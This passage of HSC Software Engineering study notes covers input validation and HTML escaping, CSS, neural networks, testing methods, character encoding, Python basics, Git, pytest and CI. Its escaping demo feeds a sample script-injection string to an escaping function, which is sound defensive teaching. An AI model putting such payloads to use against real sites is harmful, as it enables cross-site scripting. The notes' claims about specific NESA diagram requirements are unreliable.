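    return USERNAME_PATTERN.fullmatch(text) is not None


# Escaping output: < > & " ' are converted to HTML entities
def render_comment(comment):
    return f"<p>{html.escape(comment, quote=True)}</p>"


# Content Security Policy: a header name/value pair a server could attach to each
# response so that only scripts from the site's own origin are allowed to run
CSP_HEADER = ("Content-Security-Policy", "default-src 'self'; script-src 'self'")

print(is_valid_username("alice_01"))
print(is_valid_username("<script>"))
print(render_comment("<script>alert(1)</script>"))
print(": ".join(CSP_HEADER))
```

The layers are complementary: validation narrows what is accepted, escaping makes whatever is stored harmless when displayed, and the policy limits the damage if something still slips through.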

🎨 Cascading Style Sheets (CSS)

CSS describes the visual presentation of HTML documents — colours, layout, fonts, and spacing. Styles cascade: more specific rules override more general ones.

CSS — Syntax and Examples

/* Syntax: selector { property: value; } */

/* Element selector — targets all <p> tags */
p {
  font-size: 16px;
  color: #333333;
  line-height: 1.6;
}

/* Class selector — targets elements with class="highlight" */
.highlight {
  background-color: yellow;
  font-weight: bold;
}

/* ID selector — targets the unique element with id="header" */
#header {
  background-color: #2c3e50;
  padding: 20px;
  text-align: center;
}

/* Descendant selector — targets <a> inside .nav */
.nav a {
  color: white;
  text-decoration: none;
}

Selector: Chooses which element(s) to style, by element (p), class (.name), ID (#name), or descendant (div p).

Property: The visual attribute to change: color, font-size, margin, padding, display.

Value: The setting for that property: red, 16px, 1em, auto, #ff0000.

Specificity: More specific selectors win: ID > class > element. Inline styles override all three; only a declaration marked !important outranks them.

🤖 Machine Learning

Machine learning (ML) enables systems to learn patterns from data and make predictions or decisions without being explicitly programmed for each case.

♾️ Machine Learning Automation through MLOps

MLOps integrates ML workflows with software engineering and DevOps practices to make model development and deployment reliable and repeatable. Three stages:

1. Design: Define the problem, choose success metrics, and research available data sources. Determine whether ML is the right solution.

2. Model Development: Collect and clean data (wrangling), select features (feature engineering), train the model, then validate and tune it.

3. Operations: Deploy the trained model to production, monitor its real-world performance, and retrain when the model degrades over time.

📉 Regression Algorithms

Supervised learning algorithms that predict a continuous numerical output from input features. The algorithm learns the mapping between inputs and outputs from labelled training data.

Linear Regression: Fits a straight line to the data: y = mx + b. Example: predicting a student's final exam score from hours studied.

Multiple Linear Regression: Extends to multiple input features: y = m₁x₁ + m₂x₂ + … + b. Example: predicting house price from size, location, and age.

Logistic Regression: Despite the name, used for classification — outputs a probability between 0 and 1. Example: spam or not spam.

Polynomial Regression: Fits a curved line by adding powers of features (x², x³, …). Used when data has a non-linear relationship.
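
As a concrete illustration of simple linear regression, the sketch below fits y = mx + b by ordinary least squares using plain Python. The hours-studied and exam-score figures are invented for the example, and `fit_line` is a hypothetical helper name; in practice a library would normally do this step.

```python
def fit_line(xs, ys):
    """Least-squares estimates of slope m and intercept b for y = m*x + b."""
    n = len(xs)
    mean_x = sum(xs) / n
    mean_y = sum(ys) / n
    # Slope: how x and y vary together, divided by how much x varies on its own
    sxy = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys))
    sxx = sum((x - mean_x) ** 2 for x in xs)
    m = sxy / sxx
    b = mean_y - m * mean_x      # the fitted line passes through the mean point
    return m, b


hours = [1, 2, 3, 4, 5]          # invented training data: hours studied
scores = [52, 58, 65, 70, 78]    # invented training data: exam scores

m, b = fit_line(hours, scores)
print("slope:", round(m, 2), "intercept:", round(b, 2))
print("predicted score for 6 hours:", round(m * 6 + b, 1))
```

The slope reads as "extra marks per additional hour studied", which is the kind of interpretation that makes linear models easy to explain.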

🕸️ Neural Networks

Computational models loosely inspired by the brain, composed of layers of interconnected nodes (neurons). Each connection has a weight that is adjusted during training.

Neural Network Architecture showing hidden layers and weights

graph LR
    %% Input Layer
    I1((x₁)):::inputLayer
    I2((x₂)):::inputLayer
    I3((x₃)):::inputLayer

    %% Hidden Layer 1
    H1_1((h₁)):::hiddenLayer
    H1_2((h₂)):::hiddenLayer
    H1_3((h₃)):::hiddenLayer

    %% Output Layer
    O1((Spam)):::outputLayer
    O2((Not Spam)):::outputLayer

    %% Connections with varying weights
    I1 --> H1_1
    I1 --> H1_2
    I1 --> H1_3
    I2 --> H1_1
    I2 --> H1_2
    I2 --> H1_3
    I3 --> H1_1
    I3 --> H1_2
    I3 --> H1_3
    H1_1 --> O1
    H1_1 --> O2
    H1_2 --> O1
    H1_2 --> O2
    H1_3 --> O1
    H1_3 --> O2

    %% Styling to simulate varying signal strength (weights)
    linkStyle 0 stroke-width:4px,stroke:#6366f1;
    linkStyle 1 stroke-width:1px,stroke:#94a3b8;
    linkStyle 2 stroke-width:2px,stroke:#94a3b8;
    linkStyle 3 stroke-width:1px,stroke:#94a3b8;
    linkStyle 4 stroke-width:5px,stroke:#6366f1;
    linkStyle 5 stroke-width:2px,stroke:#94a3b8;
    linkStyle 6 stroke-width:2px,stroke:#94a3b8;
    linkStyle 7 stroke-width:1px,stroke:#94a3b8;
    linkStyle 8 stroke-width:3px,stroke:#6366f1;

    classDef inputLayer fill:#dbeafe,stroke:#3b82f6,color:#000;
    classDef hiddenLayer fill:#f3e8ff,stroke:#a855f7,color:#000;
    classDef outputLayer fill:#dcfce7,stroke:#22c55e,color:#000;

Notice the variable line thicknesses connecting the nodes — these represent internal weightings, a core NESA requirement to visually demonstrate signal priority in neural architectures.

📥 Input layer: Receives the raw input features (e.g. pixel values of an image, or sensor readings). One node per feature.

🧠 Hidden layer(s): One or more intermediate layers that learn to detect patterns automatically. "Deep learning" refers to networks with many hidden layers.

📤 Output layer: Produces the final prediction. For binary classification: 1 node. For n classes: n nodes. For regression: 1 node (continuous value).

⚖️ Weights & biases: Numerical parameters adjusted during training to minimise prediction error. Each connection has a weight and each neuron has a bias.

⚡ Activation function: Introduces non-linearity at each neuron (e.g. ReLU, Sigmoid). Without it, any stack of layers collapses into a single linear transformation, so the network could learn nothing more complex than a linear model.
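Python: Forward pass through a tiny network (illustrative)

The components above can be sketched in plain Python. This is a minimal illustration, not a training-ready implementation: the layer helper, the 3-3-1 layout (one output node, as used for binary classification) and every weight and bias value are assumptions chosen by hand.

```python
import math

def relu(x):
    """ReLU activation: negative values become 0."""
    return max(0.0, x)

def sigmoid(x):
    """Sigmoid activation: squashes any value into the range 0 to 1."""
    return 1 / (1 + math.exp(-x))

def layer(inputs, weights, biases, activation):
    """Each neuron: weighted sum of all inputs, plus its bias, then activation."""
    outputs = []
    for neuron_weights, bias in zip(weights, biases):
        total = sum(w * x for w, x in zip(neuron_weights, inputs)) + bias
        outputs.append(activation(total))
    return outputs

# Hand-picked illustrative values (a trained network would learn these)
inputs = [1.0, 0.5, -1.0]                      # input layer: 3 features
hidden_weights = [[0.2, -0.4, 0.1],            # one row of weights per hidden neuron
                  [0.7, 0.3, -0.5],
                  [-0.6, 0.8, 0.9]]
hidden_biases = [0.0, 0.1, -0.2]
output_weights = [[0.5, -0.3, 0.8]]            # a single output neuron
output_biases = [0.05]

hidden = layer(inputs, hidden_weights, hidden_biases, relu)
output = layer(hidden, output_weights, output_biases, sigmoid)
print("Hidden layer:", hidden)
print("Output (probability):", output[0])
```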

🏋️ Training Cycle

The four steps below are repeated many times until the model's error stops improving. Each complete pass through the training data is called an epoch.

1️⃣ Forward pass: Input data flows through the network layer by layer to produce a prediction.

2️⃣ Loss calculation: A loss function (e.g. mean squared error) measures how far the prediction is from the expected output.

3️⃣ Backpropagation: The loss gradient is computed and propagated backwards through the network to find each weight's contribution to the error.

4️⃣ Weight update: An optimiser (e.g. gradient descent) nudges weights in the direction that reduces the loss.
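Python: Training loop for a one-weight model (illustrative)

The four steps can be seen in a small sketch that trains a single weight. This is a deliberately simplified assumption: the "network" is just prediction = weight × x, the data follows y = 2x, and the learning rate and epoch count were picked by hand. With only one weight, backpropagation reduces to a single gradient formula.

```python
# Made-up training data following the relationship y = 2x
xs = [1.0, 2.0, 3.0, 4.0]
ys = [2.0, 4.0, 6.0, 8.0]

weight = 0.0            # arbitrary starting guess
learning_rate = 0.01    # how far to nudge the weight each epoch
loss_history = []

for epoch in range(200):
    # 1. Forward pass: produce a prediction for every input
    predictions = [weight * x for x in xs]

    # 2. Loss calculation: mean squared error
    errors = [p - y for p, y in zip(predictions, ys)]
    loss = sum(e ** 2 for e in errors) / len(xs)
    loss_history.append(loss)

    # 3. Backpropagation: gradient of the loss with respect to the weight
    gradient = sum(2 * e * x for e, x in zip(errors, xs)) / len(xs)

    # 4. Weight update: one step of gradient descent
    weight -= learning_rate * gradient

print(f"First epoch loss: {loss_history[0]:.2f}")
print(f"Last epoch loss:  {loss_history[-1]:.6f}")
print(f"Learned weight:   {weight:.3f}")
```

The learned weight should settle very close to 2, the value that generated the data.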

🚀 Execution Cycle (Inference)

Inference: The trained model receives new, unseen input and performs a forward pass to generate a prediction. No weight updates occur.

Deployment: The model is packaged and integrated into an application or API so end users can benefit from its predictions in real time.

🧪 Methods for Testing a System

Testing verifies that a system behaves correctly and meets its requirements. Different testing methods serve different purposes at different stages of development.

🔧 Functional testing: Verifies the system produces the correct output for a given input, according to its functional requirements. Tests specific features in isolation.

✅ Acceptance testing: Conducted with stakeholders to confirm the system meets agreed requirements. The final check before deployment.

📡 Live data testing: Tests using real-world production data in a staging environment, revealing issues that only emerge with authentic data patterns.

🎲 Simulated data testing: Uses artificially generated data to test scenarios that may be rare or impossible to reproduce with live data (e.g. edge cases, extreme values).

🧑‍💻 Beta testing: Releases the product to a limited group of real users before full launch to identify usability issues and bugs in realistic conditions.

📦 Volume testing: Evaluates system performance under large quantities of data to identify scalability and performance bottlenecks.
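Python: Generating simulated test data (illustrative)

Simulated data testing can be sketched in a few lines. The helper names generate_scores and is_valid, and the 0 to 100 score rule, are assumptions chosen for illustration. A fixed seed is used so the same "random" data is produced on every run, which keeps a failing test reproducible.

```python
import random

def generate_scores(count, seed=0):
    """Return hand-picked edge cases followed by `count` pseudo-random scores."""
    rng = random.Random(seed)              # fixed seed makes the data repeatable
    edge_cases = [-1, 0, 100, 101]         # boundaries and one step outside them
    random_values = [rng.randint(-50, 150) for _ in range(count)]
    return edge_cases + random_values

def is_valid(score):
    """The rule under test: a score must be between 0 and 100 inclusive."""
    return 0 <= score <= 100

data = generate_scores(1000)
accepted = [s for s in data if is_valid(s)]
rejected = [s for s in data if not is_valid(s)]
print(f"{len(data)} values generated: {len(accepted)} accepted, {len(rejected)} rejected")
```

Raising the count (for example to several million) turns the same generator into a simple source of data for volume testing.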

📋 Test Data Categories

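When designing test cases, you should always include data from three categories: valid (normal), boundary, and invalid. The table below uses a score field that accepts whole numbers from 0 to 100.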

Category	Test Input	Expected Result	Reason
Valid — normal	`50`	Accepted — "Score recorded"	Middle of valid range
Valid — normal	`85`	Accepted — "Score recorded"	Within range, typical value
Boundary — lower limit	`0`	Accepted — "Score recorded"	Exactly at minimum
Boundary — upper limit	`100`	Accepted — "Score recorded"	Exactly at maximum
Boundary — just below min	`-1`	Rejected — "Score must be 0–100"	One below minimum (off-by-one check)
Boundary — just above max	`101`	Rejected — "Score must be 0–100"	One above maximum (off-by-one check)
Invalid — wrong type	`"abc"`	Rejected — "Must enter a number"	String input where integer expected
Invalid — extreme	`9999`	Rejected — "Score must be 0–100"	Far outside valid range

Exam tip: Always test at the boundary values and one step either side of them. Off-by-one errors (e.g. using > instead of >=) are one of the most common programming bugs and will only be caught by boundary test data.
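Python: Running the test data table against a validator (illustrative)

The table above can be turned into an automated check. The validate_score function below is a hypothetical implementation written to match the table's expected results; the actual system under test is not shown in these notes.

```python
def validate_score(raw):
    """Return the message the system should show for one raw input string."""
    try:
        score = int(raw)
    except ValueError:
        return "Must enter a number"
    if 0 <= score <= 100:          # >= and <= so both boundaries are accepted
        return "Score recorded"
    return "Score must be 0–100"

# (input, expected message) pairs taken from the table
test_cases = [
    ("50", "Score recorded"),
    ("85", "Score recorded"),
    ("0", "Score recorded"),
    ("100", "Score recorded"),
    ("-1", "Score must be 0–100"),
    ("101", "Score must be 0–100"),
    ("abc", "Must enter a number"),
    ("9999", "Score must be 0–100"),
]

results = []
for raw, expected in test_cases:
    actual = validate_score(raw)
    results.append(actual == expected)
    status = "PASS" if actual == expected else "FAIL"
    print(f"{status}: input {raw!r} gave {actual!r}")
```

Changing 0 <= score to 0 < score in the validator makes only the "0" case fail, which is exactly the kind of off-by-one error the boundary rows exist to catch.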

🔣 Character Representation

Computers store text by mapping each character to a numeric code, which is then stored in binary. The encoding standard used determines which number corresponds to which character.

ASCII: American Standard Code for Information Interchange. A 7-bit encoding representing 128 characters: uppercase letters (A–Z), lowercase (a–z), digits (0–9), punctuation, and control codes.

Unicode: An international standard that assigns a unique code point to over 140,000 characters, covering most of the world's writing systems including emojis.

UTF-8: The most common Unicode encoding on the web. Uses 1–4 bytes per character. Fully backwards-compatible with ASCII (characters 0–127 use the same byte values).
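Python: UTF-8 byte lengths (illustrative)

The variable width of UTF-8 is easy to observe with str.encode. The four sample characters below were chosen for illustration, one for each possible byte length.

```python
samples = [
    "A",            # Latin capital A (also in ASCII)
    "\u00e9",       # e with acute accent
    "\u20ac",       # euro sign
    "\U0001F600",   # grinning face emoji
]

byte_lengths = []
for ch in samples:
    encoded = ch.encode("utf-8")
    byte_lengths.append(len(encoded))
    print(f"{ch!r}: code point U+{ord(ch):04X}, "
          f"{len(encoded)} byte(s): {encoded.hex(' ')}")

# ASCII characters have identical bytes in both encodings
print("A".encode("utf-8") == "A".encode("ascii"))
```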

🔢 Character Code Examples

Character	ASCII Decimal	Hexadecimal	Binary (8-bit)
`A`	65	0x41	0100 0001
`B`	66	0x42	0100 0010
`a`	97	0x61	0110 0001
`z`	122	0x7A	0111 1010
`0`	48	0x30	0011 0000
`Space`	32	0x20	0010 0000

Case conversion trick: Notice that 'A' = 65 and 'a' = 97, a difference of exactly 32 (0b00100000). To convert an uppercase letter to lowercase in binary, you simply set bit 5 to 1 (counting from bit 0 at the right-hand end). This is why character encoding matters to developers beyond just storing text.

Python — Character encoding examples

# Convert between characters and their ASCII codes
print(ord('A'))        # → 65
print(ord('a'))        # → 97
print(chr(65))         # → 'A'
print(chr(90))         # → 'Z'

# Case conversion using the difference of 32 between upper and lower case
upper = 'H'
lower = chr(ord(upper) + 32)   # 72 + 32 = 104 → 'h'
print(lower)                   # → 'h'

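# Simple Caesar cipher: shift each uppercase letter by 3, wrapping Z back round to A
message = "HELLO"
ciphertext = ""
for ch in message:
    offset = (ord(ch) - ord('A') + 3) % 26   # position in the alphabet after shifting
    ciphertext += chr(ord('A') + offset)
print(ciphertext)    # → 'KHOOR'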

# Check if a character is uppercase, lowercase, or digit
ch = 'G'
if 65 <= ord(ch) <= 90:
    print(f"{ch} is uppercase")
elif 97 <= ord(ch) <= 122:
    print(f"{ch} is lowercase")
elif 48 <= ord(ch) <= 57:
    print(f"{ch} is a digit")
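Python: Case conversion with bitwise operators (illustrative)

The case conversion trick can also be written with bitwise operators instead of adding 32. This is a sketch for ASCII letters only; the names CASE_BIT, to_lower and to_upper are made up for this example, and in real programs str.lower() and str.upper() are the right tools.

```python
CASE_BIT = 0b00100000   # bit 5, worth 32

def to_lower(ch):
    """Set bit 5 to turn an uppercase ASCII letter into lowercase."""
    if 'A' <= ch <= 'Z':
        return chr(ord(ch) | CASE_BIT)
    return ch   # leave everything else unchanged

def to_upper(ch):
    """Clear bit 5 to turn a lowercase ASCII letter into uppercase."""
    if 'a' <= ch <= 'z':
        return chr(ord(ch) & ~CASE_BIT)
    return ch

print(format(ord('H'), '08b'), 'H')                       # 01001000 H
print(format(ord(to_lower('H')), '08b'), to_lower('H'))   # 01101000 h
print(to_upper('z'))                                      # Z
```

The range checks matter: setting bit 5 on a character that is not an uppercase letter would produce an unrelated character.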

Python — Bitwise Operations Workshop (XOR Encryption)

# NESA requires understanding 'simple encryption' via binary format.
# XOR (^) is a perfect demonstration: encrypting twice with the same key restores the data.

def simple_xor_encrypt(text, key):
    result = ""
    for char in text:
        # 1. Get the character's numeric code (an integer, stored in binary)
        char_val = ord(char)
        # 2. XOR with the key
        cipher_val = char_val ^ key
        # 3. Convert back to character format
        result += chr(cipher_val)
    return result

plaintext = "HSC"
key = 42  # Arbitrary secret key for XOR

# Encrypt
cipher = simple_xor_encrypt(plaintext, key)
print(f"Encrypted string: {cipher!r}")   # → 'byi'

# Decrypt (applying the same XOR again flips the same bits back)
decrypted = simple_xor_encrypt(cipher, key)
print(f"Decrypted string: {decrypted}")  # → HSC
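Python: XOR at the bit level (illustrative)

To see why the same operation both encrypts and decrypts, it helps to print the bits. The show_xor helper below is an illustrative addition, not part of the workshop code above; it uses the same key of 42.

```python
def show_xor(char, key):
    """Print the bit patterns for one character being XORed twice with key."""
    plain = ord(char)
    cipher = plain ^ key       # bits flip wherever the key has a 1
    restored = cipher ^ key    # the same bits flip back again
    print(f"plain    {plain:08b}  ({plain}, {chr(plain)!r})")
    print(f"key      {key:08b}  ({key})")
    print(f"cipher   {cipher:08b}  ({cipher}, {chr(cipher)!r})")
    print(f"restored {restored:08b}  ({restored}, {chr(restored)!r})")
    return cipher, restored

cipher_val, restored_val = show_xor("H", 42)
```

XOR with a single repeating key is useful for learning but is easy to break, so it should not be used to protect real data.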

🐍 Programming with Python

Python is the primary programming language for the HSC Software Engineering course. It uses indentation (not braces) to define code blocks, and its syntax is designed to read much like plain English.

📦 Variables, Input & Output

Python

# Variables are dynamically typed — no need to declare a type
name = "Alice"
age = 17
score = 87.5
is_passing = True

# Getting input from the user (always returns a string)
name = input("Enter your name: ")
age = int(input("Enter your age: "))    # Convert to integer
score = float(input("Enter score: "))   # Convert to float

# Output
print("Hello,", name)
print(f"Score: {score:.1f}/100")        # f-string with 1 decimal place

🔀 Selection

Python

# Binary selection
if score >= 50:
    print("Pass")
else:
    print("Fail")

# Multi-way selection (elif chain)
if score >= 90:
    grade = "A"
elif score >= 75:
    grade = "B"
elif score >= 50:
    grade = "C"
else:
    grade = "Fail"
print(f"Grade: {grade}")

🔁 Repetition

Python

# for loop — counted repetition (range gives 1, 2, 3, 4, 5)
total = 0
for i in range(1, 6):
    score = int(input(f"Enter score {i}: "))
    total += score
average = total / 5
print(f"Average: {average}")

# while loop — condition-controlled (pre-test)
password = input("Enter password: ")
while password != "secret123":
    print("Incorrect. Try again.")
    password = input("Enter password: ")
print("Access granted.")

🔧 Functions

Python

# Procedure — performs an action, no return value
def display_result(name, score):
    print(f"{name}: {score}/100")
    if score >= 50:
        print("  → Pass")
    else:
        print("  → Fail")

# Function — returns a computed value
def calculate_grade(score):
    if score >= 90:
        return "A"
    elif score >= 75:
        return "B"
    elif score >= 50:
        return "C"
    else:
        return "Fail"

# Calling them
display_result("Alice", 87)
grade = calculate_grade(87)
print(f"Grade: {grade}")     # Grade: B

📚 Lists & Iteration

Python

scores = [85, 92, 78, 64, 90]

# Access by index (0-based)
print(scores[0])    # 85
print(scores[-1])   # 90 (last element)

# Common list operations
scores.append(77)         # Add to end
scores.sort()             # Sort ascending
scores.sort(reverse=True) # Sort descending
highest = max(scores)
lowest = min(scores)
average = sum(scores) / len(scores)

# Iterate over a list
for s in scores:
    print(s, end=" ")    # 92 90 85 78 77 64

# List comprehension — filter passing scores
passing = [s for s in scores if s >= 50]

💾 File I/O

Python

# Writing to a file
with open("scores.txt", "w") as f:
    for score in scores:
        f.write(str(score) + "\n")

# Reading from a file
with open("scores.txt", "r") as f:
    for line in f:
        value = int(line.strip())   # strip() removes trailing newline
        print(value)

# Appending to an existing file
with open("scores.txt", "a") as f:
    f.write("99\n")

📖 Dictionaries

Python

# Dictionary stores key-value pairs
student = {
    "name": "Alice",
    "age": 17,
    "score": 87.5
}

# Access and update
print(student["name"])          # Alice
student["score"] = 92.0         # Update value
student["subject"] = "SoftEng" # Add new key

# Iterate over key-value pairs
for key, value in student.items():
    print(f"{key}: {value}")

⚠️ Exception Handling

Python — try / except

# Basic exception handling — prevent a crash on bad input
try:
    age = int(input("Enter your age: "))
    print(f"In 10 years you will be {age + 10}")
except ValueError:
    print("Error: please enter a whole number.")

# Handle multiple exception types
try:
    with open("data.txt", "r") as f:
        data = f.read()
    number = int(data.strip())
    result = 100 / number
    print(f"Result: {result}")
except FileNotFoundError:
    print("Error: data.txt not found.")
except ValueError:
    print("Error: file does not contain a valid integer.")
except ZeroDivisionError:
    print("Error: cannot divide by zero.")
finally:
    print("Processing complete.")   # Runs whether an exception occurred or not

When to use try/except: Wrap code that interacts with the outside world (user input, file I/O, network calls, and type conversions), since these can fail for reasons beyond your control. Do not use exceptions to control normal program flow; use if/else for expected conditions.
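Python: Combining try/except with if/else (illustrative)

The guideline above can be sketched with one function that uses both techniques. The function name safe_ratio and its default parameter are assumptions for this example. File access and type conversion are wrapped in try/except because they depend on the outside world, while a value of zero is an expected condition and is handled with an ordinary if.

```python
import os
import tempfile

def safe_ratio(path, default=None):
    """Read an integer from the file at `path` and return 100 / value.

    Returns `default` if the file is missing, is not an integer, or holds 0.
    """
    try:
        with open(path, "r") as f:
            number = int(f.read().strip())
    except (FileNotFoundError, ValueError):
        return default          # failures outside our control
    if number == 0:             # expected condition: plain if, no exception needed
        return default
    return 100 / number

# Usage with temporary files so the example cleans up after itself
with tempfile.TemporaryDirectory() as folder:
    good = os.path.join(folder, "good.txt")
    zero = os.path.join(folder, "zero.txt")
    with open(good, "w") as f:
        f.write("4\n")
    with open(zero, "w") as f:
        f.write("0\n")
    good_result = safe_ratio(good)
    zero_result = safe_ratio(zero, default=-1)
    missing_result = safe_ratio(os.path.join(folder, "missing.txt"), default=-1)

print(good_result, zero_result, missing_result)
```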

Part 5 ⚙️ Quality & Workflow

🔀 Git & Version Control Workflow

Git is a distributed version control system that tracks every change to your code. Every commit is a snapshot — you can revert to any previous state, compare versions, and collaborate without overwriting each other's work.

📋 Core Git Commands Reference

Command	What It Does	Example
`git init`	Initialise a new empty repository	`git init myproject`
`git clone`	Copy a remote repository to your machine	`git clone https://github.com/user/repo.git`
`git status`	Show which files are changed, staged, or untracked	`git status`
`git add`	Stage changes for the next commit	`git add app.py` or `git add .`
`git commit`	Save staged changes as a commit with a message	`git commit -m "Add login feature"`
`git push`	Upload local commits to the remote repository	`git push origin main`
`git pull`	Download and merge remote changes	`git pull origin main`
`git fetch`	Download remote changes without merging	`git fetch origin`
`git branch`	List, create, or delete branches	`git branch feature/login`
`git checkout`	Switch branches or restore files	`git checkout feature/login`
`git switch`	Switch branches (modern alternative to checkout)	`git switch -c feature/login`
`git merge`	Merge a branch into the current branch	`git merge feature/login`
`git log`	Show commit history	`git log --oneline --graph`
`git diff`	Show unstaged changes	`git diff app.py`
`git stash`	Temporarily shelve uncommitted changes	`git stash` (restore later with `git stash pop`)
`git tag`	Create a labelled reference to a commit	`git tag v1.0.0`
`git reset`	Undo commits (use with caution!)	`git reset --soft HEAD~1`
`git revert`	Create a new commit that undoes a previous one (safe)	`git revert abc1234`
`git remote`	Manage remote repository connections	`git remote -v`
`git rm`	Delete a file from the working directory and stage its removal	`git rm old_file.py`

🌿 Feature Branch Workflow

Feature Branch Workflow
──────────────────────────────────────────────────────────────
main ──●──────────────────────────────────●── stable/deployable
        \                                /
         ● feature/login                ← merged via Pull Request
          \                            /
           ●──●──●  (develop here)   ●── all tests pass
──────────────────────────────────────────────────────────────
Steps:
1. git switch -c feature/login      ← create feature branch
2. write code, git add, git commit  ← develop and commit
3. git push origin feature/login    ← push to remote
4. Open Pull Request on GitHub      ← request code review
5. Peer reviews → approves          ← quality gate
6. Merge into main                  ← integrated and deployed
7. git branch -d feature/login      ← clean up

Bash — Complete Feature Branch Workflow

# Start from an up-to-date main branch
git switch main
git pull origin main

# Create and switch to a new feature branch
git switch -c feature/student-search

# ... write code ...

# Stage and commit changes
git add search.py templates/search.html
git commit -m "Add student search by name and ID"

# Push branch to remote
git push -u origin feature/student-search

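# After the PR is reviewed, approved and merged on GitHub,
# update your local main so it contains the merged work
git switch main
git pull origin main

# Alternative when no Pull Request is used: merge locally, then push
# git merge feature/student-search
# git push origin main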

# Clean up
git branch -d feature/student-search

🙈 Example .gitignore for Python Projects

.gitignore — Python project

# Virtual environments
venv/
.venv/
env/

# Python bytecode
__pycache__/
*.pyc
*.pyo

# Environment variables (NEVER commit secrets)
.env
.env.local
secrets.json

# IDE files
.vscode/
.idea/
*.swp

# Test coverage reports
.coverage
htmlcov/

# Build outputs
dist/
build/
*.egg-info/

Good Commit Message Guide:
✓ Use imperative mood: "Add login page" not "Added login page"
✓ Keep subject line under 50 characters
✓ Explain why the change was made, not just what
✓ Reference related issue numbers: "Fix input validation (closes #12)"
✗ Don't write: "fix", "wip", "changes", "update stuff"

🧪 Testing Frameworks

The two most widely used Python testing frameworks are unittest and pytest. Both let you write automated tests that you can re-run after every change to confirm your code still behaves correctly.

🧪 unittest — Built-in Python Testing

Python — unittest example with setUp

import unittest
from bank_account import BankAccount   # the module we're testing

class TestBankAccount(unittest.TestCase):

    def setUp(self):
        """Runs before each test method — creates fresh test data."""
        self.account = BankAccount("Alice", 1000)

    def tearDown(self):
        """Runs after each test method — clean up if needed."""
        pass

    def test_initial_balance(self):
        self.assertEqual(self.account.balance, 1000)

    def test_deposit_increases_balance(self):
        self.account.deposit(500)
        self.assertEqual(self.account.balance, 1500)

    def test_withdraw_decreases_balance(self):
        self.account.withdraw(200)
        self.assertEqual(self.account.balance, 800)

    def test_withdraw_insufficient_funds_raises_error(self):
        with self.assertRaises(ValueError):
            self.account.withdraw(9999)

    def test_deposit_negative_raises_error(self):
        with self.assertRaises(ValueError):
            self.account.deposit(-50)

    def test_balance_cannot_go_negative(self):
        self.account.withdraw(1000)
        self.assertGreaterEqual(self.account.balance, 0)

if __name__ == '__main__':
    unittest.main(verbosity=2)
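Python: A possible bank_account.py (illustrative)

The tests above import BankAccount from a bank_account module that these notes do not show. The class below is one hypothetical implementation that would satisfy those tests; the attribute names are inferred from the test code, and the error messages are assumptions.

```python
class BankAccount:
    """A simple account whose balance can never go below zero."""

    def __init__(self, owner, balance=0):
        self.owner = owner
        self.balance = balance

    def deposit(self, amount):
        """Add money to the account; the amount must be positive."""
        if amount <= 0:
            raise ValueError("Deposit amount must be positive")
        self.balance += amount

    def withdraw(self, amount):
        """Remove money from the account if enough funds are available."""
        if amount <= 0:
            raise ValueError("Withdrawal amount must be positive")
        if amount > self.balance:
            raise ValueError("Insufficient funds")
        self.balance -= amount

# Quick manual check
account = BankAccount("Alice", 1000)
account.deposit(500)
account.withdraw(200)
print(account.balance)   # 1300
```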

🐍 pytest — Modern Python Testing

pytest is simpler to write and provides more detailed failure output than unittest. Tests are just functions prefixed with test_.

Python — pytest with fixture and parametrize

import pytest
from bank_account import BankAccount

@pytest.fixture
def account():
    """pytest fixture — creates a BankAccount for each test."""
    return BankAccount("Bob", 500)

def test_deposit(account):
    account.deposit(100)
    assert account.balance == 600

def test_withdraw(account):
    account.withdraw(200)
    assert account.balance == 300

# Parametrize: run same test with multiple inputs
@pytest.mark.parametrize("amount,expected", [
    (100, 600),
    (500, 1000),
    (0.01, 500.01),
])
def test_deposit_parametrized(account, amount, expected):
    account.deposit(amount)
    assert account.balance == pytest.approx(expected)

⚖️ unittest vs pytest Comparison

Feature	unittest	pytest
Syntax	Class-based, verbose	Function-based, minimal
Built into Python?	Yes	No — requires `pip install pytest`
Failure output	Basic	Detailed diff with variable values
Fixtures	`setUp`/`tearDown`	`@pytest.fixture` — more flexible
Parametrised tests	Requires subTest or loops	`@pytest.mark.parametrize`
HSC recommendation	Fine for simple projects	Preferred for clean, readable tests

🔄 TDD — Test-Driven Development

TDD Cycle: Red → Green → Refactor
──────────────────────────────────────────
🔴 RED      Write a failing test FIRST
            (the feature doesn't exist yet — test must fail)
      ↓
🟢 GREEN    Write the minimum code to make the test pass
            (don't over-engineer — just make it pass)
      ↓
🔵 REFACTOR Improve the code's design without changing behaviour
            (tests still pass — they protect against regressions)
      ↓
  Repeat for the next feature
──────────────────────────────────────────
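Python: One pass through the TDD cycle (illustrative)

A single pass through the cycle might look like the sketch below. The is_passing function and the pass mark of 50 are assumptions chosen to match the earlier selection examples. In practice the test and the code would live in separate files and be run with pytest; here they share one file so the example is self-contained.

```python
# RED: the test is written first. Run before is_passing exists,
# it fails with a NameError.
def test_is_passing():
    assert is_passing(50) is True     # boundary: exactly the pass mark
    assert is_passing(49) is False    # one below the boundary
    assert is_passing(100) is True

# GREEN: the minimum code that makes the test pass would be
#     return score >= 50
# REFACTOR: the magic number is then moved into a named constant.
# Behaviour is unchanged, so the same test must still pass.
PASS_MARK = 50

def is_passing(score):
    """Return True if the score reaches the pass mark."""
    return score >= PASS_MARK

test_is_passing()
print("All tests pass")
```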

Code Coverage: Run coverage run -m pytest, then coverage report, to see what percentage of your code is executed by tests. Aim for at least 80% coverage. To see exactly which lines are missed, run coverage html and open htmlcov/index.html.

⚙️ CI/CD — Continuous Integration & Deployment

CI/CD automates the build, test, and deployment pipeline. Every time code is pushed, the pipeline runs automatically — catching bugs before they reach production.

Continuous Integration (CI): Automatically build and test code on every push. If any test fails, the team is immediately notified. Prevents "works on my machine" problems by testing on a fresh, consistent environment.

Continuous Deployment (CD): Automatically deploy code to production (or staging) when all tests pass. The pipeline handles build, test, and deploy without manual steps.

🚀 GitHub Actions — Automated Testing on Push

YAML — .github/workflows/tests.yml

name: Run Tests

on:
  push:
    branches: [ main, develop ]
  pull_request:
    branches: [ main ]

jobs:
  test:
    runs-on: ubuntu-latest

    steps:
    - name: Check out code
      uses: actions/checkout@v4

    - name: Set up Python 3.11
      uses: actions/setup-python@v4
      with:
        python-version: '3.11'

    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        pip install -r requirements.txt
        pip install pytest coverage

    - name: Run tests with coverage
      run: |
        coverage run -m pytest tests/ -v
        coverage report --fail-under=80

CI/CD Benefits for HSC Projects:
Even for solo HSC projects, a CI pipeline adds value — every push is automatically tested, so you always know whether your changes broke anything. It also demonstrates professional development practice in your folio documentation.

